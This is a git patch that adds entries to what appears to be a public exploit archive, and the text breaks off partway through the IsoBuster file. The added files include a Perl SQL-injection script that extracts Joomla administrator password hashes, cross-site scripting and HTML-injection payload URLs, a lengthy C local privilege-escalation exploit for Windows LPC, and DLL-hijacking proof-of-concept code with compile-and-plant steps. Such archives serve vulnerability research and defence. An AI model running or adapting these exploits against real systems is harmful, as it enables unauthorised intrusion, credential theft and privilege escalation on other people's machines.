From 2a66404f6be21b743fb97d36982ee26f63f8bf3e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 2 Oct 2014 04:44:52 +0000 Subject: [PATCH] Updated 10_02_2014 --- files.csv | 14 + platforms/php/webapps/34820.pl | 33 ++ platforms/php/webapps/34824.txt | 7 + platforms/php/webapps/34825.html | 11 + platforms/php/webapps/34826.html | 9 + platforms/php/webapps/34827.txt | 9 + platforms/php/webapps/34828.txt | 12 + platforms/php/webapps/34833.txt | 7 + platforms/windows/local/34822.c | 469 +++++++++++++++++++++++++++++ platforms/windows/remote/34821.txt | 9 + platforms/windows/remote/34823.c | 48 +++ platforms/windows/remote/34829.c | 43 +++ platforms/windows/remote/34830.c | 48 +++ platforms/windows/remote/34831.c | 45 +++ platforms/windows/remote/34832.c | 45 +++ 15 files changed, 809 insertions(+) create mode 100755 platforms/php/webapps/34820.pl create mode 100755 platforms/php/webapps/34824.txt create mode 100755 platforms/php/webapps/34825.html create mode 100755 platforms/php/webapps/34826.html create mode 100755 platforms/php/webapps/34827.txt create mode 100755 platforms/php/webapps/34828.txt create mode 100755 platforms/php/webapps/34833.txt create mode 100755 platforms/windows/local/34822.c create mode 100755 platforms/windows/remote/34821.txt create mode 100755 platforms/windows/remote/34823.c create mode 100755 platforms/windows/remote/34829.c create mode 100755 platforms/windows/remote/34830.c create mode 100755 platforms/windows/remote/34831.c create mode 100755 platforms/windows/remote/34832.c diff --git a/files.csv b/files.csv index 50356dec6..165fe3a8e 100755 --- a/files.csv +++ b/files.csv @@ -31348,3 +31348,17 @@ id,file,description,date,author,platform,type,port 34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include Vulnerability",2014-09-29,Vulnerability-Lab,ios,webapps,0 34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange IIS HTTP Internal IP Address Disclosure",2014-09-29,"Nate Power",windows,webapps,0 34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - CSRF Vulnerability",2014-09-29,"Dolev Farhi",php,webapps,446 +34820,platforms/php/webapps/34820.pl,"Joomla Club Manager Component 'cm_id' Parameter SQL Injection Vulnerability",2010-10-06,FL0RiX,php,webapps,0 +34821,platforms/windows/remote/34821.txt,"InstallShield 2009 15.0.0.53 Premier 'ISWiAutomation15.dll' ActiveX Arbitrary File Overwrite Vulnerability",2009-09-15,the_Edit0r,windows,remote,0 +34822,platforms/windows/local/34822.c,"Microsoft Windows Local Procedure Call (LPC) Local Privilege Escalation Vulnerability",2010-09-07,yuange,windows,local,0 +34823,platforms/windows/remote/34823.c,"Dupehunter Professional 9.0.0.3911 'Fwpuclnt.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-08,anT!-Tr0J4n,windows,remote,0 +34824,platforms/php/webapps/34824.txt,"Lantern CMS '11-login.asp' Cross Site Scripting Vulnerability",2010-10-08,"High-Tech Bridge SA",php,webapps,0 +34825,platforms/php/webapps/34825.html,"Curverider Elgg 1.0 Templates HTML Injection Vulnerability",2009-06-22,lorddemon,php,webapps,0 +34826,platforms/php/webapps/34826.html,"OPEN IT OverLook 5 'title.php' Cross Site Scripting Vulnerability",2010-10-08,"Anatolia Security",php,webapps,0 +34827,platforms/php/webapps/34827.txt,"Recipe Script 5.0 'First Name' HTML Injection",2009-06-15,"ThE g0bL!N",php,webapps,0 +34828,platforms/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 Cross Site Scripting Vulnerabilities",2010-10-06,"High-Tech Bridge SA",php,webapps,0 +34829,platforms/windows/remote/34829.c,"Adobe Dreamweaver CS4 'mfc80esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0 +34830,platforms/windows/remote/34830.c,"IsoBuster 2.7 'wnaspi32.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0 +34831,platforms/windows/remote/34831.c,"NetStumbler 0.4 'mfc71esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0 +34832,platforms/windows/remote/34832.c,"Microsoft Visio 2007 'mfc80esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0 +34833,platforms/php/webapps/34833.txt,"Joomla! and Mambo 'com_trade' Component 'PID' Parameter Cross Site Scripting Vulnerability",2010-10-11,FL0RiX,php,webapps,0 diff --git a/platforms/php/webapps/34820.pl b/platforms/php/webapps/34820.pl new file mode 100755 index 000000000..c33581f7b --- /dev/null +++ b/platforms/php/webapps/34820.pl @@ -0,0 +1,33 @@ +source: http://www.securityfocus.com/bid/43821/info + +The Club Manager component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +#!/usr/bin/perl -w + +######################################## +#[~] Author : Fl0riX +#[!] Script Name: Joomla com_clubmanager +######################################## +print "\t\t \n\n"; +print "\t\t Fl0rix | Bug Researchers \n\n"; +print "\t\t \n\n"; +print "\t\t Joomla com_clubmanager Remote SQL Injection Exploit \n\n"; +use LWP::UserAgent; +print "\nSite ismi Target page:[http://wwww.site.com/path/]: "; +chomp(my $target=); +$florix="concat(username,0x3a,password)"; +$sakkure="jos_users"; +$com="com_clubmanager"; +$cw="+UNION+SELECT+"; +$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); +$host = $target . "/index.php?option=".$com."&tabla=equip&task=presenta&cm_id=284".$cw."1,".$florix.",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/".$sakkure."+--+"; +$res = $b->request(HTTP::Request->new(GET=>$host)); +$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ +print "\n[+] Admin Hash : $1\n\n"; +print "# Baba Buyuksun bea Bu is bu kadar xD #\n\n"; +} +else{print "\n[-] Malesef Olmadi Aga bir dahaki sefere\n"; +} \ No newline at end of file diff --git a/platforms/php/webapps/34824.txt b/platforms/php/webapps/34824.txt new file mode 100755 index 000000000..17b95bec8 --- /dev/null +++ b/platforms/php/webapps/34824.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/43865/info + +Lantern CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/www/html/11-login.asp?intPassedLocationID=57%27%22%3E%3Cscript%3Ealert%2834%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34825.html b/platforms/php/webapps/34825.html new file mode 100755 index 000000000..cc7497a4a --- /dev/null +++ b/platforms/php/webapps/34825.html @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/43871/info + +Elgg is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Exploits require the attacker be an authenticated user; this permission may be trivial to acquire. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Elgg 1.0 is vulnerable; other versions may also be affected. + +
<------ Eye with this <------ Eye with this <---------Eye with this <---------Eye with this
\ No newline at end of file diff --git a/platforms/php/webapps/34826.html b/platforms/php/webapps/34826.html new file mode 100755 index 000000000..4a0191a46 --- /dev/null +++ b/platforms/php/webapps/34826.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43872/info + +OverLook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +OverLook 5.0 is vulnerable; prior versions may also be affected. + + OverLook v5.0 Cross-site Scripting
<--">
\ No newline at end of file diff --git a/platforms/php/webapps/34827.txt b/platforms/php/webapps/34827.txt new file mode 100755 index 000000000..2ac8a15cb --- /dev/null +++ b/platforms/php/webapps/34827.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43888/info + +Recipe Script is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Recipe Script 5.0 is vulnerable; other versions may also be affected. + + \ No newline at end of file diff --git a/platforms/php/webapps/34828.txt b/platforms/php/webapps/34828.txt new file mode 100755 index 000000000..5dca0da4d --- /dev/null +++ b/platforms/php/webapps/34828.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/43910/info + +Backbone Technology Expression is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Backbone Technology Expression 18.09.2010 is vulnerable; other versions may also be affected. + +http://www.example.com/?section_copy_id=1005176%27%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E + + +http://www.example.com/?section_id=1002815%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E diff --git a/platforms/php/webapps/34833.txt b/platforms/php/webapps/34833.txt new file mode 100755 index 000000000..90133c097 --- /dev/null +++ b/platforms/php/webapps/34833.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/43915/info + +The 'com_trade' component for Joomla! and Mambo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/index.php?option=com_trade&task=product_info&Itemid=florix&PID=[XSS] \ No newline at end of file diff --git a/platforms/windows/local/34822.c b/platforms/windows/local/34822.c new file mode 100755 index 000000000..fc8e3098a --- /dev/null +++ b/platforms/windows/local/34822.c @@ -0,0 +1,469 @@ +source: http://www.securityfocus.com/bid/43860/info + +Microsoft Windows is prone to a local privilege-escalation vulnerability. + +A local attacker can exploit this issue to execute arbitrary code and elevate their privileges to the NetworkService account level. Failed exploit attempts may cause a denial-of-service condition. + +The issue affects Microsoft Windows XP SP3; other versions may also be affected. + +#include +#include +//#include "ntdll.h" +//#pragma comment(lib,"ntdll.lib") +#pragma comment(lib,"advapi32.lib") + +typedef enum _PROCESSINFOCLASS { +ProcessDebugPort=7// 7 Y Y +} PROCESSINFOCLASS; +typedef struct _UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING ,*PUNICODE_STRING; +typedef struct _CLIENT_ID +{ + HANDLE UniqueProcess; + HANDLE UniqueThread; +}CLIENT_ID,* PCLIENT_ID, **PPCLIENT_ID; +#define PORT_NAME_LEN 64 +#define LRPC_CONNECT_REQUEST 0 +#define LPC_CONNECTION_REQUEST 10 +#define offset 0x100+0x4-0x6*4 +#define MAXLEN 0x148 +#define BACKNAME L"\\RPC Control\\back2" +#define RPCLPCNAME L"\\RPC Control\\epmapper" +#define BINDNAME L"back2" +typedef struct _LRPC_BIND_EXCHANGE +{ + INT ConnectType ; + DWORD AssocKey ; + char szPortName[PORT_NAME_LEN] ; + RPC_SYNTAX_IDENTIFIER InterfaceId; + RPC_SYNTAX_IDENTIFIER TransferSyntax; + RPC_STATUS RpcStatus; + unsigned char fBindBack ; + unsigned char fNewSecurityContext ; + unsigned char fNewPresentationContext; + unsigned char PresentationContext; + unsigned char Pad[3]; + unsigned long SecurityContextId; +} LRPC_BIND_EXCHANGE; +typedef struct _LPC_MESSAGE +{ + USHORT DataSize; + USHORT MessageSize; + USHORT MessageType; + USHORT DataInfoOffset; + CLIENT_ID ClientId; + ULONG MessageId; + ULONG SectionSize; +// UCHAR & nbsp; Data[]; +}LPC_MESSAGE, *PLPC_MESSAGE; + +typedef struct _OBJECT_ATTRIBUTES +{ + DWORD Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + DWORD Attributes; + PVOID SecurityDescriptor; + PVOID SecurityQualityOfService; +}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES, **PPOBJECT_ATTRIBUTES; + +typedef +DWORD +(CALLBACK * NTCREATEPORT)( + OUT PHANDLE PortHandle, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG MaxConnectInfoLength, + IN ULONG MaxDataLength, + IN OUT PULONG Reserved OPTIONAL ); +typedef +DWORD +(CALLBACK * NTREPLYWAITRECVIVEPORT)( + IN HANDLE PortHandle, + OUT PHANDLE ReceivePortHandle OPTIONAL, + IN PLPC_MESSAGE Reply OPTIONAL, + OUT PLPC_MESSAGE IncomingRequest ); + +typedef +DWORD +(CALLBACK * NTACCEPTCONNECTPORT) ( + OUT PHANDLE PortHandle, + IN PVOID PortContext OPTIONAL, + IN PLPC_MESSAGE ConnectionRequest, + IN BOOLEAN AcceptConnection, + IN OUT int int1, // IN OUT PPORT_VIEW ServerView OPTIONAL, + OUT int int2 //OUT PREMOTE_PORT_VIEW ClientView OPTIONAL + ); +typedef +DWORD +(CALLBACK * NTCONNECTPORT)( + OUT PHANDLE PortHandle, + IN PUNICODE_STRING PortName, + IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, + IN OUT int int1, + // IN OUT PPORT_VIEW ClientView OPTIONAL, + IN OUT int int2, + // IN OUT PREMOTE_PORT_VIEW ServerView OPTIONAL, + OUT PULONG MaxMessageLength OPTIONAL, + IN OUT PVOID ConnectionInformation OPTIONAL, + IN OUT PULONG ConnectionInformationLength OPTIONAL + ); +typedef +DWORD +(CALLBACK *NTREQUESTWAITREPLYPORT)( // NtRequestWaitReplyPort( + IN HANDLE PortHandle, + IN PLPC_MESSAGE Request, + OUT PLPC_MESSAGE IncomingReply ); +typedef +DWORD +(CALLBACK *NTCOMPLETECONNECTPORT) ( + IN HANDLE PortHandle + ); +typedef +DWORD +(CALLBACK *RTLINITUNICODESTRING)( + PUNICODE_STRING DestinationString, + PCWSTR SourceString + ); +typedef +DWORD +(CALLBACK * NTREPLYPORT)( + IN HANDLE PortHandle, + IN PLPC_MESSAGE Reply ); +typedef +DWORD +(CALLBACK * NTSETINFORMATIONPROCESS)( + IN HANDLE ProcessHandle, + IN PROCESSINFOCLASS ProcessInformationClass, + IN PVOID ProcessInformation, + IN ULONG ProcessInformationLength ); + +typedef struct _DEBUG_MESSAGE +{ + LPC_MESSAGE PORT_MSG; + DEBUG_EVENT DebugEvent; +}DEBUG_MESSAGE, *PDEBUG_MESSAGE; + +NTSETINFORMATIONPROCESS NtSetInformationProcess; +NTREPLYWAITRECVIVEPORT NtReplyWaitReceivePort; +NTCREATEPORT NtCreatePort; +NTREPLYPORT NtReplyPort; +NTCONNECTPORT NtConnectPort; +RTLINITUNICODESTRING RtlInitUnicodeString; +NTREQUESTWAITREPLYPORT NtRequestWaitReplyPort; +NTACCEPTCONNECTPORT NtAcceptConnectPort; +NTCOMPLETECONNECTPORT NtCompleteConnectPort; + +template struct PORT_MESSAGEX : LPC_MESSAGE { +UCHAR Data[i]; +}; +PROCESS_INFORMATION pi; +int server(); +void initapi(); +int main() +{ +// LPC_MESSAGE Reply; +// HMODULE hNtdll; +// DWORD dwAddrList[9]; + BOOL bExit = FALSE; +// DWORD dwRet; +// HANDLE hPort; + int k=0; + unsigned long i; +// DEBUG_MESSAGE dm; + OBJECT_ATTRIBUTES oa = {sizeof(oa)}; + PORT_MESSAGEX<0x130> PortReply,PortRecv; + STARTUPINFO si={sizeof(si)}; + // NTSTATUS + int Status; + + PLPC_MESSAGE Request; +// PLPC_MESSAGE IncomingReply; + LPC_MESSAGE Message; + HANDLE LsaCommandPortHandle; + UNICODE_STRING LsaCommandPortName; + SECURITY_QUALITY_OF_SERVICE DynamicQos; + LRPC_BIND_EXCHANGE BindExchange; + DWORD Key=0x11223344; + unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE); + BindExchange.ConnectType = LRPC_CONNECT_REQUEST ; + BindExchange.AssocKey = Key; +// wcscpy((wchar_t *)&(BindExchange.szPortName),BINDNAME); + DynamicQos.ImpersonationLevel =SecurityAnonymous; // SecurityImpersonation; + DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING; //SECURITY_DYNAMIC_TRACKING; + DynamicQos.EffectiveOnly = TRUE; + initapi(); + printf( "\r\nwindows lpc test!\r\n"); + + CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)server,0,0,&i); + + + // + // Connect to the Reference Monitor Command Port. This port + // is used to send commands from the LSA to the Reference Monitor. + // + RtlInitUnicodeString( &LsaCommandPortName,RPCLPCNAME); + Status = NtConnectPort( + &LsaCommandPortHandle, + &LsaCommandPortName, + &DynamicQos, + NULL, + NULL, + NULL, // &maxlen, + &BindExchange, + &Bi ndExchangeLength); + if ((Status)) { + + exit(Status); + //print(("LsapRmInitializeServer - Connect to Rm Command Port failed 0x%lx\n",Status)); + // goto InitServerError; + } + +// exit(0); +/* + //create port + dwRet = NtCreatePort(&hPort, &oa, 0, 0x148, 0); + if(dwRet != 0) + { + printf("create hPort failed. ret=%.8X\n", dwRet); + return 0; + } + //create process + if(!CreateProcess(0, "debugme.exe", NULL, NULL, TRUE, + CREATE_SUSPENDED, 0, 0, &si, &pi)) + { + printf("CreateProcess failed:%d\n", GetLastError()); + return 0; + } + //set debug port + dwRet = NtSetInformationProcess(pi.hProcess, ProcessDebugPort, + &hPort, sizeof(hPo rt)); + if(dwRet != 0) + { + printf("set debug port error:%.8X\n", dwRet); + return 0; + } + //printf("pid:0x%.8X %d hPort=0x%.8X\n", pi.dwProcessId, pi.dwProcessId, hPort); + ResumeThread(pi.hThread); +*/ + while (true) + { + memset(&Message, 0, sizeof(Message)); + + Message.MessageSize=0x118; + Message.DataSize=0x100; + Message.MessageId=0x1122; + Request=&Message; + + + + memset(&PortReply, 0, sizeof(PortReply)); + // memcpy(&PortReply, &dm, sizeof(dm)); + + memset(&PortReply, 0, sizeof(PortReply)); + // memcpy(&PortReply, &dm, sizeof(dm)); + PortReply.MessageSize = 0x100; + PortReply.DataSize = 0x100-0x18; + PortReply.MessageType=0; + PortReply.MessageId=0x1122; + PortReply.Data[0]=0x0b; + PortReply.Data[1]=0; + PortReply.Data[2]=0; + PortReply.Data[3]=0; + PortReply.Data[4]=0; + wcscpy((wchar_t *)&(PortReply.Data[0x10]),BINDNAME); + Sleep(1000); + Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); //Reply); + + + // memcpy(&PortReply.Data[offset-4], &dwAddrList, sizeof(dwAddrList)); + + PortReply.MessageSize = 0xa0; + PortReply.DataSize = 0xa0-0x18; + PortReply.MessageType=0; + PortReply.MessageId=0x1122; + PortReply.Data[0]=0x0; + PortReply.Data[1]=0; + PortReply.Data[2]=0; + PortReply.Data[3]=0; + PortReply.Data[4]=0; + memcpy((unsigned char *)&(PortReply.Data[0x0c]), + "\x80\xbd\xa8\xaf\x8a\x7d\xc9\x11\xbe\xf4\x08\x00\x2b\x10\x29\x89\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00",0x20); + +//"\xe6\x73\x0c\xe6\xf9\x88\xcf\x11\x9a\xf1\x00\x20\xaf\x6e\x72\xf4\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00",0x20); + + // memcpy(&PortReply.Data[offset-4], &dwAddrList, sizeof(dwAddrList)); + + _asm{ + // die: jmp die + } + Sleep(1000); + Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); //Reply); + BindExchange=*(LRPC_BIND_EXCHANGE *)&(PortRecv.Data[8]); + + if (!(Status)) + { + while(1){ + PortReply.MessageSize = 0x100; + PortReply.DataSize = 0x100-0x18; + PortReply.MessageType=0; + PortReply.MessageId=PortRecv.MessageId; + PortReply.Data[0]=0x01; + PortReply.Data[1]=0; + PortReply.Data[2]=0; + PortReply.Data[3]=0; + PortReply.Data[4]=0x3; + PortReply.Data[5]=0; + PortReply.Data[6]=0; + + + *(int *)(&(PortReply.Data[0x18]))=*(int *)(&(PortRecv.Data[0x30])); + + _asm{ +// die: jmp die + } + Sleep(100); + Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); //Reply); + + + Sleep(0x7fffffff); + } + } + } + + + return 0; +} + +int server() +{ + BOOL bExit = FALSE; + DWORD dwRet; +// HANDLE hPort; + int k=0; + unsigned long maxlen; + // DEBUG_MESSAGE dm; + OBJECT_ATTRIBUTES oa = {sizeof(oa)}; + PORT_MESSAGEX<0x130> PortReply,PortRecv; + STARTUPINFO si={sizeof(si)}; + // NTSTATUS + int Status; + + PLPC_MESSAGE Request; + PLPC_MESSAGE IncomingReply; + LPC_MESSAGE Message; + HANDLE BackPortHandle,NewHandle,NewAccHandle; + UNICODE_STRING BackPortName; + SECURITY_QUALITY_OF_SERVICE DynamicQos; + LRPC_BIND_EXCHANGE BindExchange; + DWORD Key=0x11223344; + unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE); + BindExchange.ConnectType = LRPC_CONNECT_REQUEST ; + BindExchange.AssocKey = Key; + + DynamicQos.ImpersonationLevel =SecurityAnonymous; // SecurityImpersonation; + DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING; //SECURITY_DYNAMIC_TRACKING; + DynamicQos.EffectiveOnly = TRUE; + + + + + RtlInitUnicodeString( &BackPortName,BACKNAME); + memset(&oa,0,sizeof(oa)); + oa.Length=0x18; + oa.ObjectName=&BackPortName; + oa.Attributes=0x40; + + //InitializeObjectAttributes(&oa,&BackPortName,0x40,0,0); + //OBJ_CASE_INSENSITIVE,0,0); //SecurityDescriptor); + + //create port + dwRet = NtCreatePort(&BackPortHandle, &oa, sizeof(LRPC_BIND_EXCHANGE),MAXLEN, 0); + if(dwRet != 0) + { + printf("create hPort failed. ret=%.8X\n", dwRet); + // return 0; + } + + while (true) + { + memset(&Message, 0, sizeof(Message)); + + Message.MessageSize=0x118; + Message.DataSize=0x100; + Message.MessageId=0x11; + Request=&Message; + memset(&PortReply, 0, sizeof(PortReply)); + // memcpy(&PortReply, &dm, sizeof(dm)); + PortReply.MessageSize = 0x148; + PortReply.DataSize = 0x130; + PortReply.MessageType=0; + PortReply.Data[0]=0x0b; + PortReply.Data[1]=0; + PortReply.Data[2]=0; + PortReply.Data[3]=0; + PortReply.Data[4]=0; + + // memcpy(&PortReply.Data[offset-4], &dwAddrList, sizeof(dwAddrList)); + + Status=NtReplyWaitReceivePort(BackPortHandle,0,0,&PortRecv); //Reply); + if(PortRecv.MessageType==LPC_CONNECTION_REQUEST) + { + Status=NtAcceptConnectPort(&NewAccHandle, 0, &PortRecv,1, NULL, NULL); + Status=NtCompleteConnectPort (NewAccHandle); + + memset(&PortRecv, 0, sizeof(PortRecv)); + + Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv); //&PortReply,&PortRecv); + + while(1) + { + PortRecv.MessageSize = 0x148; + PortRecv.DataSize = 0x130; + + // PortReply.MessageId=PortRecv.MessageId; + _asm{ +//die: jmp die + } + Status=NtReplyWaitReceivePort(NewAccHandle,0,&PortRecv,&PortRecv); //&PortReply,&PortRecv); + Sleep(100); + Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv); //&PortReply,&PortRecv); + } + } + } +} + +void initapi() +{ + HMODULE hNtdll; + + //get native api address + hNtdll = LoadLibrary("ntdll.dll"); + if(hNtdll == NULL) + { + printf("LoadLibrary failed:%d\n", GetLastError()); + } + NtReplyWaitReceivePort = (NTREPLYWAITRECVIVEPORT) + GetProcAddress(hNtdll, "NtReplyWaitReceivePort"); + NtCreatePort = (NTCREATEPORT) + GetProcAddress(hNtdll, "NtCreatePort"); + NtReplyPort = (NTREPLYPORT) + GetProcAddress(hNtdll, "NtReplyPort"); + NtSetInformationProcess = (NTSETINFORMATIONPROCESS) + GetProcAddress(hNtdll, "NtSetInformationProcess"); + NtRequestWaitReplyPort= (NTREQUESTWAITREPLYPORT) + GetProcAddress(hNtdll,"NtRequestWaitReplyPort"); + + NtConnectPort = (NTCONNECTPORT) + GetProcAddress(hNtdll, "NtConnectPort"); + NtCompleteConnectPort = (NTCOMPLETECONNECTPORT) + GetProcAddress(hNtdll, "NtCompleteConnectPort"); + NtAcceptConnectPort = (NTACCEPTCONNECTPORT) + GetProcAddress(hNtdll, "NtAcceptConnectPort"); + RtlInitUnicodeString=(RTLINITUNICODESTRING) + GetProcAddress(hNtdll,"RtlInitUnicodeString"); + +} + diff --git a/platforms/windows/remote/34821.txt b/platforms/windows/remote/34821.txt new file mode 100755 index 000000000..6cdd6254b --- /dev/null +++ b/platforms/windows/remote/34821.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43857/info + +InstallShield 2009 Premier ActiveX control is prone to an arbitrary-file-overwrite vulnerability. + +Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application (typically Internet Explorer) using the ActiveX control. + +InstallShield 2009 Premier 15.0.0.53 is vulnerable; other versions may also be affected. + +# Part Expl0it & Bug Codes ( Poc ) : ------------------------------------ Installshiled 2009 premier 15.0.0.53 File Overwrite Expl0it by : the_Edit0r \ No newline at end of file diff --git a/platforms/windows/remote/34823.c b/platforms/windows/remote/34823.c new file mode 100755 index 000000000..987a7d663 --- /dev/null +++ b/platforms/windows/remote/34823.c @@ -0,0 +1,48 @@ +source: http://www.securityfocus.com/bid/43863/info + +Dupehunter Professional is prone to a vulnerability that lets attackers execute arbitrary code. + +An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. + +Dupehunter Professional 9.0.0.3911 is vulnerable; other versions may also be affected. + +/* +#Dupehunter Professional DLL Hijacking Exploit (fwpuclnt.dll) +#Author : anT!-Tr0J4n +#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends +#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com +#Software Link:http://www.dupehunter.com +#Tested on: Windows XP sp3 +# Home : www.Dev-PoinT.com + +##################### +How TO use : Compile and rename to " fwpuclnt.dll " , create a file in the same dir with one of the following extensions. +check the result > Hack3d +##################### + +#fwpuclnt.dll (code) +*/ + +#include "stdafx.h" + +void init() { +MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "anT!-Tr0J4n",0x00000003); +} + + +BOOL APIENTRY DllMain( HANDLE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) +{ +case DLL_PROCESS_ATTACH: + init();break; +case DLL_THREAD_ATTACH: +case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: +break; + } + return TRUE; +} diff --git a/platforms/windows/remote/34829.c b/platforms/windows/remote/34829.c new file mode 100755 index 000000000..dcda21daf --- /dev/null +++ b/platforms/windows/remote/34829.c @@ -0,0 +1,43 @@ +source: http://www.securityfocus.com/bid/43911/info + +Adobe Dreamweaver CS4 is prone to a vulnerability that lets attackers execute arbitrary code. + +An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file. + +/* +============================================================================ +Adobe Dreamweaver CS4 - v10.0 Build 4117 DLL Hijacking Exploit (mfc80esn.dll) +============================================================================= + +$ Program: Adobe Dreamweaver +$ Version: v10.0 Build 4117 +$ Download: http://www.adobe.com/es/products/dreamweaver/ +$ Date: 2010/10/08 + +Found by Pepelux +http://www.pepelux.org +eNYe-Sec - www.enye-sec.org + +Tested on: Windows XP SP2 && Windows XP SP3 + +How to use : + +1> Compile this code as mfc80esn.dll + gcc -shared -o mfc80esn.dll thiscode.c +2> Move DLL file to the directory where Dreamweaver is installed +3> Open any file recognized by Dreamweaver +*/ + + +#include +#define DllExport __declspec (dllexport) +int mes() +{ + MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK); + return 0; +} +BOOL WINAPI DllMain ( + HANDLE hinstDLL, + DWORD fdwReason, + LPVOID lpvReserved) + {mes();} diff --git a/platforms/windows/remote/34830.c b/platforms/windows/remote/34830.c new file mode 100755 index 000000000..a1c019840 --- /dev/null +++ b/platforms/windows/remote/34830.c @@ -0,0 +1,48 @@ +source: http://www.securityfocus.com/bid/43912/info + +IsoBuster is prone to a vulnerability that lets attackers execute arbitrary code. + +An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. + +IsoBuster 2.7 is vulnerable; other versions may also be affected. + +/* +================================================================== +IsoBuster v2.7 (Build 2.7.0.0) DLL Hijacking Exploit (wnaspi32.dll) +=================================================================== + +$ Program: IsoBuster +$ Version: v2.7 (Build 2.7.0.0) +$ Download: http://www.isobuster.com/ +$ Date: 2010/10/08 + +Found by Pepelux +http://www.pepelux.org +eNYe-Sec - www.enye-sec.org + +Tested on: Windows XP SP2 && Windows XP SP3 + +Extensions: " .rar && .r00 ... .r99 && .zoo " + +How to use : + +1> Compile this code as wnaspi32.dll + gcc -shared -o wnaspi32.dll thiscode.c +2> Move DLL file to the directory where IsoBuster is installed +3> Open any file recognized by isobuster +*/ + + +#include +#define DllExport __declspec (dllexport) +int mes() +{ + MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK); + return 0; +} +BOOL WINAPI DllMain ( + HANDLE hinstDLL, + DWORD 